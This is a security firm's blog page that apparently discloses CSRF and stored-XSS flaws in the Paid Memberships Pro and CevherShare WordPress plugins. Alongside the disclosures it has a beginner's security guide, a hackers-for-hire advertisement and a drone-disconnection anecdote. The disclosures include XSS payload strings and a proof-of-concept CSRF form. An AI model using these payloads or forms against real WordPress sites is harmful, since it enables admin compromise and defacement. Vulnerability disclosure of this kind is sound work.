50 thousand WordPress sites use Paid membership WP Plugin & suffer from SQL injection & CSRF to stored XSS

wefightforsecurityJuly 6, 2017July 6, 2017cyber security, wordpress security

Update: A new version of Paid memberships pro has been released to the WordPress repo, fixing the CSRF to stored XSS issue written about below, however anyone using paid memberships pro 1.9.2 or lower is still vulnerable. The sql injections still exist in many areas of the code, however some areas are protected, which we had yet to review. It does show improvement that two issues were fixed so quickly by the developer.

Paid Membership pro is a WordPress plugin that helps people buy your products and or services and is used on over 50 thousand sites, sadly the security is lacking. We were reviewing the plugin and discovered it is vulnerable to everything from sql injections and CSRF to stored XSS.While our information is usually locked down to paying customers, we decided it was in the best interest of the WordPress community to publicly expose these flaws. As always, Jetpack which is owned by Automattic reports this plugin as safe, due to the flawed way Jetpack decides if something is safe or not, which sadly gives users a false sense of security.

Incorrect security alert from Jetpack on Paid Memberships Pro

We reported Paid membership pro to WordPress security who removed the plugin from the WordPress repo. Unfortunately, removing a plugin from the WordPress repo does not help the affected users. Due to this problem, we believe public disclosure is best, especially since rewriting the plugin to fix all the issues in a timely manner would take a team of several people working solely on that project.

How is WordPress plugin Paid membership pro vulnerable to SQL injections?

This is a good question for those who aren’t used to security issues and the reason is simple. The developer either didn’t know about sql injection or didn’t know what to do about it. The code executes sql queries with little to no protection against sql injection. To put it simply, information that went into the database was not protected against criminals or researchers from manipulating data in the WordPress database, stealing all the data or doing whatever they like.

How is Paid Membership pro vulnerable to CSRF to stored XSS?

First it is important to explain that cross site request forgery, also known as CSRF and s XSS are two seperate security vulnerabilities tied together creating far more damage to the users site. CSRF allows a a researcher or criminal to copy a form or other code that needs CSRF protection to another website and then can trick a user to go to the site thus forcing them to unknowingly and unwittingly cause damage to their own website. In this case you had to be logged in as an admin who is tricked into clicking a damaging link. Again, in the case of the WordPress plugin Paid membership pro, the form in question is also vulnerable to stored XSS. Stored XSS, also known as stored cross site scripting allows a researcher or criminal to inject their own code into another website, whether that code causes damage or not is fully up to the attacker. In this case it caused defacement of the logged in admin panel and the site for users who are just visiting the site, which would’ve allowed the attacker to easily gain control of the entire WordPress site and cause damage to the users and the companies brand.

Here is an image of the stored XSS on Paid membership pro, where we simply made it show the number 1 to demonstrate that code could be ran. Any code, malicious or otherwise could’ve ran just for those who don’t understand that.

Paid membership pro xss exploit example

Where is WordPress plugin paid membership pro vulnerable to CSRF to stored XSS?

step 1: For csrf to stored xss login as admin and go to the admin panel.
Step 2: go to memberships and then click on add new membership level
step 3: There is no CSRF protection protecting this page, so it is vulnerable to CSRF.
Step 4: Go to parameter name and add in a simple ‘”><Script>
alert`1`</script> to get the vulnerability as seen above.

What should you do to protect yourself? At this point in time the only option is to switch plugins or have your team rewrite the code of the plugin, which is quite a task.

The best way to help protect other users is to share this article with others and alert them to this problem. If you want access to more WordPress security alerts and informative articles like this you will want to access our WordPress Plugin Security alerts. We will be doing write ups on plugins affecting over 200 thousand sites and another that affects 3 million sites for those who pay for access. We have yet to make our automated WordPress security plugin tool to automatically post to WordPress, so in the meantime we will provide updates for our customers often.

WordPress CevHerShare Plugin CSRF to Persistent XSS — Jetpack Security incorrect

wefightforsecurityJune 24, 2017July 5, 2017cyber security, wordpress security

cevhershare WordPress plugin csrf to persistent XSS

WordPress cevehershare plugin is a plugin that allows users to use social media to share content, like the name implies. WordPress cevhershare suffered from cross site request forgery on the admin side, which we then chained together to persistent cross site scripting on the admin side. What does this mean in basic terms? It means that if an admin was logged in and clicked on a malicious link, went to a malicious website, or viewed a malicious image it could inject malicious code into the WordPress admin backend thus compromising the security of the website.

Jetpack security rating incorrect

If you look up cevhershare in the WordPress.org repo it will say it doesn’t exist, which is because wordpress.org removed it due to this security issue over 2 years ago when we reported it and surprisingly an update was never released. Unfortunately Jetpack security by wordpress.com says the Cevhershare wordpress plugin is safe, since they only go on public reports to identify if a plugin is safe or not, which is a flawed way of identifying the security of WordPress plugins. We have checked all the WordPress plugins in the WordPress.org repo and allow our customers to know if they are running plugins that are vulnerable and undisclosed.

If you are still using cevhershare, we recommend removing it and installing another social sharing plugin or just manually adding in the code for each social media site you want to use. If you would like our help with making your site more secure, feel free to contact us.

If you are interested in a proof of concept, which is how and where the software is vulnerable, here you go.

First, modify this vulnerable form and insert xss to the parameter name ‘”>

‘”><SCRipt confirm(document.referrer);</SCRipt>

Now when someone who is logged in sees this elsewhere it will automatically inject code into their WordPress site, like the picture above shows.

<form action=”http://example.com/wp-admin/options-general.php?page=CevherShare” method=”post”>
<p class=”mediumtext alignleft”><label class=”wide” for=”name”>Name:</label>
<input id=”name” class=”mediumtext” name=”name” type=”text” value=”yahoo” /></p>
<p class=”smalltext alignleft”><label class=”wide” for=”position”>Position:</label>
<input id=”position” class=”smalltext” name=”position” type=”text” value=”12″ /></p>
<p class=”checkfield alignleft”><input name=”enabled” type=”hidden” value=”0″ />
<input id=”enabled” checked=”checked” name=”enabled” type=”checkbox” value=”1″ /> <label for=”enabled”>Enabled?</label></p>

<div style=”clear: both;”></div>
<label class=”wide” for=”big”>Big Button:</label>
<textarea id=”big” class=”text” name=”big” rows=”5″><img src=”data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7″ data-wp-preserve=”%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A%2F%2Fd.yimg.com%2Fds%2Fbadge2.js%22%20badgetype%3D%22square%22%3E%5Burl%5D%3C%2Fscript%3E” data-mce-resize=”false” data-mce-placeholder=”1″ class=”mce-object” width=”20″ height=”20″ alt=”<script>” title=”<script>” /></textarea>

<label class=”wide” for=”small”>Small Button:</label>
<textarea id=”small” class=”text” name=”small” rows=”5″><img src=”data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7″ data-wp-preserve=”%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A%2F%2Fd.yimg.com%2Fds%2Fbadge2.js%22%20badgetype%3D%22small-votes%22%3E%5Burl%5D%3C%2Fscript%3E” data-mce-resize=”false” data-mce-placeholder=”1″ class=”mce-object” width=”20″ height=”20″ alt=”<script>” title=”<script>” /></textarea>

</form>

Cyber Security — A Beginners guide to Cyber Security

wefightforsecurityMay 19, 2017May 19, 2017cyber security, web security

What is cyber security?

Cyber security is the art of protecting your systems from criminals who mean to do you harm, including ransomware like wannacry which we recently wrote a guide on. Cyber security also helps you keep criminals out of your private information and even more importantly your customers private information.

If you haven’t heard of cyber security, then you most likely haven’t heard of phishing, which is fine. Phishing is another word for fraudulent emails sent to you by people who are trying to gain illegal access to your computer. Once they gain access to your computer, they can steal all your data, use your machine as part of a large network of thousands of machines to do whatever they want, also referred to as a zombie network and to make the malware keep spreading they can use your contact list to send it to all your contacts from your email address.

If you don’t think that’s bad, it gets worse. Once inside your system, the criminals have control of your computer, not you. They could charge you thousands of dollars to potentially relinquish control of it or they could put all your information online for the world to see. Of course there are plenty of other uses for your machine and your data, but we aren’t getting into that in this article, since that would make up a good portion of a book.

Why does my website need security? I don’t store anything sensitive on it.

This is a point a lot of people make and while you may not store anything on it, people do come to your website and we make sure of that if you use our SEO services, to make sure people can find you on search engines. If people come to your site and it is hacked, they will either also get infected, see your site defaced and potentially have dead bodies on it, like we’ve encountered in the past, or Google could block them from going to your site, which also hurts your rankings on their search engine.

If Google blocks them from coming to your site, then this is a major damage to your reputation. If your site is defaced, that also damages your reputation. Most people don’t know that 60 percent of cyber crime victims go out of business and 50 percent of all attacks are against small businesses.

This is what your customers will see if Google blocks them from coming to your site

Google hacked site warning blocks access to your website

So what can you do about this? Well, you can keep learning about cyber security by signing up for our mailing list, which sends out exclusive information only available to people on our mailing list.

Hackers for hire to secure your website from criminals

wefightforsecurityApril 22, 2017April 27, 2017cyber security, web securityhackers, hackers for hire, hacking, internet of things, internet security, iot, website security

We are cyber security professionals, information security professionals, but when it boils down to it we are hackers for hire that are easy to find and easy to contact. or hire by one of our hacker for hire subscription plans. When we are hired by the private sector we help secure your websites, servers, applications and any IoT device under the sun. Our plans currently only support websites, however we are professionals at IoT security, also known as internet of things security and server security. Companies hire us to stop criminal hacking before it happens or if it’s already started we put a stop to it and provide an analysis of the criminals behavior and information we have on them, along with if they are known elsewhere, since many criminals want to be known, they just don’t want to be caught.

What type of hacking will you not do? Since you’re easy to find hackers for hire will you do unethical hacking?

We are ethical hackers for hire that are easy to find, so we will not do illegal hacking. We will end up putting a FAQ together about the most common requests for illegal hacking, but a few off the top of our head of requests are to hack another users facebook account for you, instagram, or any other service. We don’t care if you tell us the person you want hacked is a cheating slimeball, that doesn’t make it legal to hack them. Since we’re ethical hackers for hire, we stick by our code and won’t hack cheating slimeballs for you.

What can you do as hackers for hire?

As hackers for hire we can do a lot, like secure your website, server, IOT products, etc. Working as hackers for hire we have recovered stolen laptops, We identified a hacker who claimed to be a woman in San Diego, who ended up being an Indian in India living in a flea hotel, who took a trove of unreleased music from a studio.

We’ve identified employees who have destroyed their companies systems making them inoperable. We’ve worked for fortune 100’s, we’ve had GoDaddy as a client showing them security flaws in their servers and we found a lot of issues.

We identify malware in companies infecting their users, we’ve helped make it so companies don’t have to pay ransomware by securing their systems and offer anti-phishing training.

What can we not do as hackers for hire? Whatever the law prohibits, which is becoming less and less. We can show you how insecure your internet connected devices are, also called internet of things devices, among other things. It’s even legal to hack a car or anything else you own to show how insecure it is.

Remotely Disconnecting Bebop Drone pilot exploit As seen on ZDF

wefightforsecurityApril 17, 2017April 17, 2017cyber security

Last year we ran into an issue when recording Smarter Living for ZDF when they gave us a drone we hadn’t hacked before which was the bebop 1. It took half an hour to find a vulnerability and exploit the bebop drone. while it isn’t a fancy exploit it got the job done. Parrot had tried to put a patch in place for the bebop drone to stop people from accessing telnet, however you could still send request to telnet. We sent a bunch of telnet requests to the drone while it was flying and remotely disconnected the user from being able to control the drone. Instead of the drone crashing no one had control of the drone and it was doing whatever it wanted requiring the director and I to grab it out of the sky.

While we have a ton more of drone vulnerabilities that we spoke about at bsides LA, we won’t be releasing them today. We went all the way down to a binary analysis, which was quite interesting and may make publicly available.

Category: cyber security